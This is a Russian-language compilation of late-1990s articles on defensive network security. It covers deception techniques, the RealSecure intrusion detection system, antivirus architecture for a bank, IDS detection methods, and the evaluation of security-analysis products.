Обычно, когда речь заходит об обмане в области информационной безопасности, сразу вспоминаются попытки злоумышленников использовать те или иные скрытые лазейки для обхода используемых средств защиты. Будь то кража паролей и работа от имени авторизованного пользователя или несанкционированное использование модемов. Однако обман может сослужить хорошую службу не только для злоумышленников, но и для защитников корпоративных ресурсов. Сразу необходимо отметить, что обман очень редко используется в качестве защитного механизма. Обычно, когда речь заходит о средствах защиты, на ум сразу приходят современнейшие межсетевые экраны, блокирующие любые попытки проникновения хакеров. Или, если обратиться к фантастической литературе, то для защиты от проникновения используются системы с искусственным интеллектом, которые "адаптируются" к нападениям злоумышленников и противопоставляют им адекватные защитные меры. Такие системы описаны в "Лабиринте отражений" Сергея Лукьяненко или "Neuromancer" Уильяма Гибсона. Но "не межсетевым экраном единым". Приходится обращать свое внимание и на другие "нестандартные" защитные механизмы. Это частично собьет с толку злоумышленников и нарушителей, привыкших к широко известным средствам обеспечения информационной безопасности [7].
Существует множество различных вариантов использования обмана в благих целях. Вкратце перечислю некоторые механизмы обмана, основываясь на классификации Даннигана (Dunnigan) и Ноуфи (Nofi):
Сокрытие Камуфляж Дезинформация
В той или иной мере эти механизмы используются в практике работ отделов безопасности. Однако, как правило, эти механизмы используются не для информационной, а для иных областей обеспечения безопасности (физическая, экономическая и т.д.).
В области информационной безопасности наибольшее распространение получил первый метод - сокрытие. Ярким примером использования этого метода в целях обеспечения информационной безопасности можно назвать сокрытие сетевой топологии при помощи межсетевого экрана. Примером камуфляжа можно назвать использование Unix-подобного графического интерфейса в системе, функционирующей под управлением операционной системы Windows NT. Если злоумышленник случайно увидел такой интерфейс, то он будет пытаться реализовать атаки, характерные для ОС Unix, а не для ОС Windows NT. Это существенно увеличит время, необходимое для "успешной" реализации атаки.
Во многих американских фильмах о хакерах, последние, атакуя военные системы Пентагона, мгновенно определяли тип программного обеспечения военной системы лишь взглянув на приглашение ввести имя и пароль. Как правило, каждая операционная система обладает присущим только ей представлением механизма идентификации пользователя, отличающимся от своих собратьев цветом и типом шрифта, которым выдается приглашение; текстом самого приглашения, местом его расположения и т.д. Камуфляж позволяет защититься от такого рода атак.
И, наконец, в качестве примера дезинформации можно назвать использование заголовков (banner), которые бы давали понять злоумышленнику, что атакуемая им система уязвима. Например, если в сети используется почтовая программа sendmail версии 8.9.3, а возвращаемый ею заголовок утверждает обратное, то нарушитель потратит много времени и ресурсов, чтобы попытаться эксплуатировать уязвимости, присущие ранним версиям sendmail (до 8.9.3).
Рассмотрим только 2 и 3 классы обманных методов, как менее известные и наиболее интересные. Работа систем их реализующих заключается в том, что эти системы эмулируют те или иные известные уязвимости, которых в реальности не существует. Использование средств (deception systems), реализующих камуфляж и дезинформацию, приводит к следующему:
1. Увеличение числа выполняемых нарушителем операций и действий. Так как заранее определить является ли обнаруженная нарушителем уязвимость истинной или нет, злоумышленнику приходится выполнять много дополнительных действий, чтобы выяснить это. И даже дополнительные действия не всегда помогают в этом. Например, попытка запустить программу подбора паролей (например, Crack для Unix или L0phtCrack для Windows) на сфальсифицированный и несуществующий в реальности файл, приведет к бесполезной трате времени без какого-либо видимого результата. Нападающий будет думать, что он не смог подобрать пароли, в то время как на самом деле программа "взлома" была просто обманута.
2. Получение возможности отследить нападающих. За тот период времени, когда нападающие пытаются проверить все обнаруженные уязвимости, в т.ч. и фиктивные, администраторы безопасности могут проследить весь путь до нарушителя или нарушителей и предпринять соответствующие меры, например, сообщить об атаке в соответствующие "силовые" структуры.
Обычно в информационной системе используются от 5 до 10 зарезервированных портов (с номерами от 1 до 1024). К ним можно отнести порты, отвечающие за функционирование сервисов HTTP, FTP, SMTP, NNTP, NetBIOS, Echo, Telnet и т.д. Если обманные системы (например, RealSecure компании ISS) эмулируют использование еще 100 и более портов, то работа нападающего увеличивается во стократ. Теперь злоумышленник обнаружит не 5-10, а 100 открытых портов. При этом мало обнаружить открытый порт, надо еще попытаться использовать уязвимости, связанные с этим портом. И даже если нападающий автоматизирует эту работу путем использования соответствующих программных средств (Nmap, SATAN и т.д.), то число выполняемых им операций все равно существенно увеличивается, что приводит к быстрому снижению производительности его работы. И при этом злоумышленник все время находится под дамокловым мечом, опасаясь своего обнаружения.
Защита вашей сети от взломщиков
Защита вашей сети от взломщиков и неавторизованного доступа - одна из наиболее важных задач корпоративной политики безопасности. Продукт RealSecure компании Check Point - средство распознавания и реагирования на атаки в реальном масштабе времени для FireWall-1, которое обеспечивает исключительный уровень защиты. Продукт позволяет вам динамически детектировать подозрительные действия в сети и оперативно предотвращать неавторизованный доступ к данным и системным ресурсам компании независимо от того, где расположен источник опасности относительно периметра сети.
В процессе своей работы в реальном времени отслеживает попытки взлома и нежелательного использования сетевых ресурсов.
Реагирует на неавторизованные или подозрительные действия посредством записи в лог-файл или запрещения действий.
Представляет события в сети в виде упорядоченных, удобных, настраиваемых, интуитивно понятных отчетов.
Осуществляет мониторинг корпоративных сетей из единого центра.
Выполняет защиту от атак Java и Active/X.
Имеет средства динамического реконфигурирования маршрутизаторов и firewall на основе предопределенных шаблонов.
Обнаружение вторжений
Повысить уровень защищенности корпоративной сети можно с помощью средств обнаружения вторжений (Intrusion Detection). Средства обнаружения вторжений хорошо дополняют защитные функции межсетевых экранов. Если межсетевые экраны стараются отсечь потенциально опасный трафик и не пропустить его в защищаемые сегменты, то средства обнаружения вторжений анализируют результирующий (то есть прошедший через межсетевой экран или созданный внутренними источниками) трафик в защищаемых сегментах и выявляют атаки на ресурсы сети или действия, которые могут классифицироваться как потенциально опасные (подозрительные). Средства обнаружения вторжений могут также использоваться и в незащищенных сегментах, например, перед межсетевым экраном, для получения общей картины об атаках, которым подвергается сеть извне.
Средства обнаружения вторжений автоматизируют такие необходимые элементы деятельности администратора системы безопасности, как:
регулярный анализ событий, связанных с доступом к ресурсам, по данным журналов аудита, выявление атак и подозрительной активности, выполнение ответных действий - реконфигурация средств защиты (межсетевых экранов, настроек операционных систем и т.п.) для пресечения подобных атак в будущем.
Для выполнения своих функций средства обнаружения вторжений обычно используют экспертные системы и другие элементы искусственного интеллекта (например, подсистему самообучения). База данных экспертной системы должна содержать сценарии большинства известных на сегодняшний день атак и постоянно пополняться.
Средства обнаружения вторжений могут обнаружить атаку в реальном времени, анализируя реальный трафик в сети, а не журнал аудита. В этом случае желательным свойством такой системы будет тесная интеграция с межсетевым экраном для немедленного блокирования трафика злоумышленника.
Средства обнаружения вторжений должны учитывать тенденции развития технологий корпоративных сетей - наличие большого количества коммутируемых сегментов, логическую структуризацию сети на основе VLAN, защиту внутреннего трафика с помощью VPN и т.п. Только в этом случае анализ трафика будет полным, а защищенность сети - высокой.
Еще одним важным требованием к средствам обнаружения вторжений является их масштабируемость, которая требуется для выполнения эффективного контроля в условиях постоянно увеличивающего количества сегментов и подсетей, а также количества защищаемых узлов в корпоративной сети.
Система RealCecure обладает хорошей масштабируемостью за счет распределенной архитектуры клиент-сервер. Сетевые агенты устанавливаются во всех требующих внимания сегментах сети (например, перед межсетевым экраном, в демилитаризованной зоне, а также в ответственных внутренних сегментах), а системные агенты контролируют активность операционных систем и приложений в компьютерах сети. Все данные собираются в общей базе данных и обрабатываются таким компонентом системы как RealSecure Engine, а централизованное управление обеспечивает RealSecure Manager, доступ к которому возможен с помощью графических консолей администраторов, распределенных по сети. Дальнейшее развитие распределенных свойств RealSecure возможно на основе архитектуры микроагентов, над которой работает в настоящее время компания ISS. Микроагенты встариваются во все защищаемые узлы корпоративной сети - маршрутизаторы, коммутаторы, компьютеры - и контролируют только тот трафик, который относится к данному узлу, за счет чего резко повышается производительность системы, что очень важно в условиях применения высокоскоростных технологий, таких как Fast Ethernet, Gigabit Ethernet, ATM и других.
Обработка протокола FTP
Сервер безопасности FTP обеспечивает не только проверку подлинности пользователя, но и проверку безопасности информации, обмен которой происходит по этому протоколу. Управление осуществляется как на уровне команд FTP-протокола (PUT/GET) и внесения ограничений на возможные имена файлов, так и путем перенаправления потоков данных на внешние серверы антивирусной проверки.
© ООО , 1998
Общая структура решения
Общая структура решения по антивирусной защите банковской информационной системы приведена на рисунке. На первом уровне защищают подключение в Интернет или сеть поставщика услуг связи - это межсетевой экран и почтовые шлюзы, поскольку по статистике именно оттуда попадает около 80% вирусов. Необходимо отметить что таким образом будет обнаружено не более 30% вирусов, так как оставшиеся 70% будут обнаружены только в процессе выполнения.
Рис. Общая структура антивирусной защиты.
Применение антивирусов для межсетевых экранов на сегодняшний день сводится к осуществлению фильтрации доступа в Интернет при одновременной проверке на вирусы проходящего трафика.
Осуществляемая такими продуктами антивирусная проверка сильно замедляет работу и имеет крайне не высокий уровень обнаружения, по этому в отсутвии необходимости фильтрации посещаемых пользователями веб-узлов применение таких продуктов является не целесообразным.
2. Как правило, защищают файл-сервера, сервера баз данных и сервера систем коллективной работы, поскольку именно они содержат наиболее важную информацию. Антивирус не является заменой средствам резервного копирования информации, однако без него можно столкнуться с ситуацией, когда резервные копии заражены, а вирус активизируется спустя полгода с момента заражения.
3. Ну и напоследок защищают рабочие станции, те хоть и не содержат важной информации, но защита может сильно снизить время аварийного восстановления.
Фактически, антивирусной защите подлежат все компоненты банковской информационной системы, связанные с транспортировкой информации и/или ее хранением:
Файл-серверы; Рабочие станции; Рабочие станции мобильных пользователей; Сервера резервного копирования; Сервера электронной почты;
Защита рабочих мест (в т.ч. мобильных пользователей) должна осуществляться антивирусными средствами и средствами сетевого экранирования рабочих станций.
Средства сетевого экранирования призваны в первую очередь обеспечивать защиту мобильных пользователей при работе через Интернет, а также обеспечивать защиту рабочих станций ЛВС компании от внутренних нарушителей политики безопасности.
Основные особенности сетевых экранов для рабочих станций:
Контролируют подключения в обе стороны Позволяют известным приложениям получить доступ в Интернет без вмешательства пользователя (autoconfig) Мастер конфигурирования на каждое приложение (только установленные приложения могут проявлять сетевую активность) Делают ПК невидимым в Интернет (прячет порты) Предотвращают известные хакерские атаки и троянские кони Извещают пользователя о попытках взлома Записывают информацию о подключениях в лог файл Предотвращают отправку данных, определённых как конфиденциальные от отправки без предварительного уведомления Не дают серверам получать информацию без ведома пользователя (cookies)
Общие требования
Программно-технические компоненты системы антивирусной защиты должны обеспечивать формирование интегрированной вычислительной среды, удовлетворяющей следующим общим принципам создания автоматизированных систем:
Надежность - система в целом должна обладать продолжать функционировать независимо от функционирования отдельных узлов системы и должна обладать средствами восстановления после отказа. Масштабируемость - система антивирусной защиты должна формироваться с учетом роста числа защищенных объектов. Открытость - система должна формироваться с учетом возможности пополнения и обновления ее функций и состава, без нарушения функционирования вычислительной среды в целом. Совместимость - поддержка антивирусным программным обеспечением максимально-возможного количества сетевых ресурсов. В структуре и функциональных особенностях компонент должны быть представлены средства взаимодействия с другими системами. Унифицированность (однородность) - компоненты должны представлять собой стандартные, промышленные системы и средства, имеющие широкую сферу применения и проверенные многократным использованием.
Кроме того, система должна обеспечивать регулярное обновление используемой антивирусной базы, содержать в себе механизмы поиска ранее неизвестных вирусов и макро вирусов, как наиболее распространенных и опасных в настоящее время.
Требования к надежности и функционированию системы
Система антивирусной защиты не должна нарушать логику работы остальных используемых приложений. Система должна обеспечивать возможность вернуться к использованию предыдущей версии антивирусных баз. Система должна функционировать в режиме функционирования объекта (рабочая станция/сервер) на котором она установлена. Система должна обеспечивать оповещение администратора системы при сбоях или обнаружении вирусов.
Обзор средств атакующих
Сейчас в Интернет доступно огромное число ресурсов, позволяющих злоумышленникам проникать в компьютерные сети. Детальная информация об уязвимых местах программ публично обсуждается в группах новостей и списках рассылки. Имеются легкодоступные руководства по организации атак, в которых описывается, как написать программы для проникновения в компьютерные сети, используя информацию об уязвимых местах в программах. И тысячи таких программных средств, позволяющих любому организовать компьютерную атаку, уже написаны. Описания компьютерных атак теперь не находятся на известных лишь узкому кругу лиц пиратских BBS, а размещаются на широко известных коммерческих веб-сайтах.
Эти программы для организации компьютерных атак доступны для получения любым пользователем Интернет. Но мало того, что доступны программы для организации атак, теперь эти программы стало легче использовать. Несколько лет назад нужно было иметь Unix, чтобы организовать атаку и нужно было уметь компилировать исходный текст программы атаки. Сегодня эти программы имеют дружественный графический интерфейс и могут работать в ряде случаев под управлением Windows 9'X или Windows NT. Имеются специальные скрипты для организации автоматизированных атак, которые позволяют легко организовать очень опасные атаки. Поэтому системным администраторам важно понимать опасность этих атак и уметь защищать свои сети от них.
Обзор технологии
Обнаружение атак на сетевом уровне
Системы обнаружения атак сетевого уровня используют в качестве источника данных для анализа необработанные (raw) сетевые пакеты. Как правило, IDS сетевого уровня используют сетевой адаптер, функционирующий в режиме "прослушивания " (promiscuous), и анализируют трафик в реальном масштабе времени по мере его прохождения через сегмент сети. Модуль распознавания атак использует четыре широко известных метода для распознавания сигнатуры атаки:
Соответствие трафика шаблону (сигнатуре), выражению или байткоду, характеризующих об атаке или подозрительном действии; Контроль частоты событий или превышение пороговой величины; Корреляция нескольких событий с низким приоритетом; Обнаружение статистических аномалий.
Как только атака обнаружена, модуль реагирования предоставляет широкий набор вариантов уведомления, выдачи сигнала тревоги и реализации контрмер в ответ на атаку. Эти варианты изменяются от системы к системе, но, как правило, включают в себя: уведомление администратора через консоль или по электронной почте, завершение соединения с атакующим узлом и/или запись сессии для последующего анализа и сбора доказательств.
Обнаружение атак на системном уровне
В начале 80-х годов, еще до того, как сети получили свое развитие, наиболее распространенная практика обнаружения атак заключалась в просмотре журналов регистрации на предмет наличия в них событий, свидетельствующих о подозрительной активности. Современные системы обнаружения атак системного уровня остаются мощным инструментом для понимания уже осуществленных атак и определения соответствующих методов для устранения возможностей их будущего применения. Современные IDS системного уровня по-прежнему используют журналы регистрации, но они стали более автоматизированными и включают сложнейшие методы обнаружения, основанные на новейших исследованиях в области математики. Как правило, IDS системного уровня контролируют систему, события и журналы регистрации событий безопасности (security log или syslog) в сетях, работающих под управлением Windows NT или Unix. Когда какой-либо из этих файлов изменяется, IDS сравнивает новые записи с сигнатурами атак, чтобы проверить, есть ли соответствие. Если такое соответствие найдено, то система посылает администратору сигнал тревоги или приводит в действие другие заданные механизмы реагирования.
IDS системного уровня постоянно развиваются, постепенно включая все новые и новые методы обнаружения. Один их таких популярных методов заключается в проверке контрольных сумм ключевых системных и исполняемых файлов через регулярные интервалы времени на предмет несанкционированных изменений. Своевременность реагирования непосредственно связана с частотой опроса. Некоторые продукты прослушивают активные порты и уведомляют администратора, когда кто-то пытается получить к ним доступ. Такой тип обнаружения вносит в операционную среду элементарный уровень обнаружения атак на сетевом уровне.
Оценка pиска:
Публичные веб-сеpвеpа взламываются почти ежедневно; угpоза того, что будет совеpшена атака и на ваш веб-сеpвеp, - pеальна.
Оценка продукта
Цель
В течение процесса оценки продукта Вы познакомитесь с вопросами, возникающими при анализе защищенности, а также возможностями, обеспечиваемыми каждым из предлагаемых продуктов. По окончании данного этапа Вы:
Будете иметь установленную и работающую на тестовых узлах сети систему анализа защищенности; Будете понимать, как продукт анализирует Вашу сеть на наличие уязвимостей; Будете понимать, как интегрировать предлагаемое решение в Вашу информационную систему.
Предположительная длительность
До 15 рабочих дней, требуемых для оценки продукта.
Процедура
Не устанавливайте программное обеспечение сразу после получения. Простота и правильность установки должен быть одним из пунктов Ваших требований при оценке. Выберите четыре хоста (один - для анализа на сетевом уровне, один - для анализа на уровне ОС, один для анализа прикладного ПО и один - для консоли управления) и сеть, которая будет тестироваться предлагаемой системой. Т.к. многие руководители будут против использования непроверенного программного обеспечения на "рабочей" сети, то для тестирования Вы должны выбрать сегмент, не используемый в повседневной деятельности Вашей организации. По каждому из пунктов списка требований, выработанных на первом этапе, проводится испытание системы. Этот шаг можно осуществить быстрее, если Вам поможет представитель производителя системы анализа защищенности. Если в процессе оценки Вы изменяете или дополняете список требований, то необходимо довести тестирование до конца, вернуться к первому этапу, а потом повторно протестировать продукт с учетом новых требований.
Такой подход гарантирует, что решение о приобретении продукта сделано на основе непротиворечивых требований, отражающих специфику Вашей организации.
Ресурсы, требуемые на этом этапе
К ресурсам, требуемым для проведения данного этапа, относятся:
Узлы и сегмент сети, доступный для тестирования - предоставляется отделом телекоммуникаций или автоматизации; Оцениваемая система анализа защищенности - предоставляется поставщиком; Требования к системе анализа защищенности - создается на первом этапе; Технический персонал для тестирования - это можете быть Вы, отдел защиты информации или телекоммуникаций Вашей организации.
Результат
Хорошее понимание того, как различные системы анализа защищенности решают предъявленные Вами требования. Выбор поставщика систем анализа защищенности. Решение о том, будет ли осуществляться постепенное развертывание (этап 3) или система анализа защищенности будет установлена сразу во всей организации. Если Вы выбираете постепенное развертывание, то Вы должны будете решить, кто должен реализовывать третий этап - поставщик, Ваши специалисты или специалисты консультанта.
Ограничение функциональности сетевых сервисов
Некоторые корпоративные сети используют топологию, которая трудно "уживается" с межсетевым экраном, или используют некоторые сервисы (например, NFS) таким образом, что применение МСЭ требует существенной перестройки всей сетевой инфраструктуры. В такой ситуации относительные затраты на приобретение и настройку межсетевого экрана могут быть сравнимы с ущербом, связанным с отсутствием МСЭ.
Решить данную проблему можно только путем правильного проектирования топологии сети на начальном этапе создания корпоративной информационной системы. Это позволит не только снизить последующие материальные затраты на приобретение средств защиты информации, но и эффективно встроить межсетевые экраны в существующую технологию обработки информации. Если сеть уже спроектирована и функционирует, то, возможно, стоит подумать о применении вместо межсетевого экрана какого-либо другого решения, например, системы обнаружения атак.
